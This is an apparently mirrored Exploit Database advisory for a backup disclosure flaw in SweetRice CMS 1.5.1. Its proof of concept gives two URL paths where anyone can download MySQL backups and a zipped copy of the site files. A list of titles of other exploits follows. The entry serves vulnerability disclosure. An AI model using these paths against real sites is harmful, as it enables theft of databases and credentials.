SweetRice 1.5.1 – Backup Disclosure

Exploit Database
32 阅读

作者： Ashiyane Digital Security Team

日期： 2016-11-06
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/40718/

Title: SweetRice 1.5.1 - Backup Disclosure
Application: SweetRice
Versions Affected: 1.5.1
Vendor URL: http://www.basic-cms.org/
Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
Discovered by: Ashiyane Digital Security Team
Tested on: Windows 10
Bugs: Backup Disclosure
Date: 16-Sept-2016


Proof of Concept :

You can access to all mysql backup and download them from this directory.
http://localhost/inc/mysql_backup

and can access to website files backup from:
http://localhost/SweetRice-transfer.zip

last Exploits
SweetRice 1.5.1 – Backup Disclosure的更多信息

Microsoft SharePoint Server 2019 – Remote Code Execution (2)：
Joomla! Component com_liveticker – Blind SQL Injection：
Joomla! Component AlphaIndex Dictionaries 1.0 – SQL Injection：
Docsify.js 4.11.4 – Reflective Cross-Site Scripting：
LetoDms 1.4.x – ‘lang’ Local File Inclusion：
AdaptCMS 2.0.2 – ‘index.php’ Script Cross-Site Scripting：
Calendarix – ‘cal_cat.php’ SQL Injection：
Online Trade 1 – Information Disclosure：